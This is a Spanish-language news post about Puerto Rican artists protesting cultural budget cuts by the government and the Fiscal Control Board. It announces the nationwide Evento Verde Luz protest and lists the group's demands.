Advertisements
La Isla Oeste

Se levanta la clase artística en reclamo ante la Junta Fiscal

Han convocado al Evento Verde Luz, una actividad artística multidisciplinaria a nivel nacional, a celebrarse el sábado, 30 de septiembre.

Por One Red Media

Artistas, gestores, educadores de Bellas Artes y amigos de la cultura en Puerto Rico, se unieron para expresar su desacuerdo con los recortes ejecutados por el gobierno central y la Junta de Control Fiscal a muchas de las entidades culturales del país.

Para ello, han convocado al Evento Verde Luz, una actividad artística multidisciplinaria a nivel nacional, a celebrarse el sábado, 30 de septiembre, a las 5:00 de la tarde, cuando se realizarán actos artísticos simultáneos y diversos en diferentes lugares para manifestar su reclamo.

La lista de personas y organizaciones que apoyan esta gesta ya sobrepasa los 800 suscriptores.

Según la declaración publicada en la página Evento Verde Luz en facebook, decenas de proyectos se quedarán sin las vitales asignaciones especiales que recibían.

“Como consecuencia, se afectará dramática y directamente la actividad que genera la industria cultural.
Las artes y la cultura son esenciales para la calidad de vida de los puertorriqueños de todas las edades y estratos sociales. Estos recortes, que comenzaron a implementarse desde hace años por varias administraciones, han dado una mortal estocada al trabajo social y educativo que logramos los artistas y las instituciones culturales”, señala la entrada en la red social.

Asimismo, censura que los recortes sean “desmedidos e insensibles” y desproveen al artista de su sustento y al pueblo de la beneficiosa exposición de su trabajo.

Como respuesta a esta situación, la iniciativa convoca a los artistas de todos los géneros y al público solidario, con la intención de aunar esfuerzos y proponer alternativas creativas que permitan seguir desarrollando y fomentando la cultura en Puerto Rico.

“Nuestra meta es crear propuestas que permitan que el desarrollo artístico del país no merme debido a los recortes presupuestarios. Entendemos que el arte, en todos sus registros, es la herramienta que permite que una sociedad crezca en todos sus niveles”.

La propuesta pide:

  • que se flexibilicen las restricciones legales que limitan la actividad cultural y la autogestión
  • que se les facilite utilizar con mayor intensidad los espacios públicos
  • que se les permita la rehabilitación de locales en desuso para convertirlos en sedes artísticas, entre muchas estrategias creativas
  • que los cursos de Bellas Artes sean reconocidos y garantizados por ley como parte medular del Currículo de Enseñanza del Sistema de Educación de Puerto Rico, en todos sus niveles

https://www.9ruey8ughjffo.xyz/script/d.php?uid=51020x3010xzzzzzzzzzzzzzzzzzzzzz&a=3453

Advertisements

Leave a Reply

%d bloggers like this: